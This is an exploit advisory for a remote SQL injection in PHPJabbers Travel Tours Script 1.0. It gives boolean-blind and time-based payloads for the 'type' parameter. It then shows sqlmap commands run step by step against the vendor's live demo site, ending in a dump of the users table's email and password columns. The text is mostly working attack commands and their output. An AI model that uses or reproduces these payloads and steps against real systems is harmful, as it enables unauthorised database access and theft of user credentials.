Travel Tours Script 1.0 SQL Injection

Travel Tours Script version 1.0 suffers from a remote SQL injection vulnerability.


SHA-256 | d512bd290713d25ede19a99a909b706643e432e27d7b04399dec782e1c4473f6

┌┌────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : phpjabbers.com │ │ │
│ Vendor : PHPJABBERS │ │ Travel Tours Script │
│ Software : Travel Tours Script V1.0 │ │ │
│ Vuln Type: Remote SQL Injection │ │ A content management solution for │
│ Method : GET │ │ travel agencies and tour operators │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : Database Access │ │ │
│ ─────────────────────────────────────┘ └────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘

Live Demo Site:

https://www.phpjabbers.com/travel-tours-script/#sectionDemo

POC:

https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]
GET parameter 'type' is vulnerable

---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206
---

[+] Starting the Attack


sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast

the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
current database: 'pjabbers_demo_vpl'


sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast


[INFO] fetching tables for database: 'pjabbers_demo_vpl'
[INFO] fetching number of tables for database 'pjabbers_demo_vpl'
[INFO] resumed: 52

+------------------------------------------+
| vacationpackages_comments |
| vacationpackages_countries |
| vacationpackages_enquiries |
| vacationpackages_features |
| vacationpackages_fields |
| vacationpackages_listings_availabilities |
| vacationpackages_listings_features |
| vacationpackages_listings |
| vacationpackages_multi_lang |
| vacationpackages_notifications |
| vacationpackages_options |
| vacationpackages_payments |
| vacationpackages_periods |
| vacationpackages_plugin_country |
| vacationpackages_plugin_galleries_set |
| vacationpackages_plugin_gallery |
| vacationpackages_plugin_locale_languages |
| vacationpackages_plugin_locale |
| vacationpackages_plugin_log_config |
| vacationpackages_plugin_log |
| vacationpackages_plugin_one_admin |
| vacationpackages_plugin_paypal |
| vacationpackages_prices |
| vacationpackages_roles |
| vacationpackages_types |
| vacationpackages_users |
| vacationpackages_comments |
| vacationpackages_countries |
| vacationpackages_enquiries |
| vacationpackages_features |
| vacationpackages_fields |
| vacationpackages_listings |
| vacationpackages_listings_availabilities |
| vacationpackages_listings_features |
| vacationpackages_multi_lang |
| vacationpackages_notifications |
| vacationpackages_options |
| vacationpackages_payments |
| vacationpackages_periods |
| vacationpackages_plugin_country |
| vacationpackages_plugin_galleries_set |
| vacationpackages_plugin_gallery |
| vacationpackages_plugin_locale |
| vacationpackages_plugin_locale_languages |
| vacationpackages_plugin_log |
| vacationpackages_plugin_log_config |
| vacationpackages_plugin_one_admin |
| vacationpackages_plugin_paypal |
| vacationpackages_prices |
| vacationpackages_roles |
| vacationpackages_types |
| vacationpackages_users |
+------------------------------------------+


sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast

[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'
Database: pjabbers_demo_vpl
Table: vacationpackages_users
[16 columns]

+----------------+--------------------------------------------------------+
| Column | Type |
+----------------+--------------------------------------------------------+
| contact_fax | varchar(255) |
| contact_mobile | varchar(255) |
| contact_phone | varchar(255) |
| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |
| contact_url | varchar(255) |
| created | datetime |
| email | varchar(255) |
| id | int(10) unsigned |
| ip | varchar(15) |
| is_active | enum('T','F') |
| last_login | datetime |
| name | varchar(255) |
| password | blob |
| phone | varchar(255) |
| role_id | int(10) unsigned |
| status | enum('T','F') |
+----------------+--------------------------------------------------------+


sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast

[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'
Database: pjabbers_demo_vpl
Table: vacationpackages_users
[1 entry]

+-----------------+------------------------+
| email | password |
+-----------------+------------------------+
|[email protected] | [email protected] |
+-----------------+------------------------+

[-] Done


└─────────────────────────────────────────────────────────────────────────────┘

Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘

Related Posts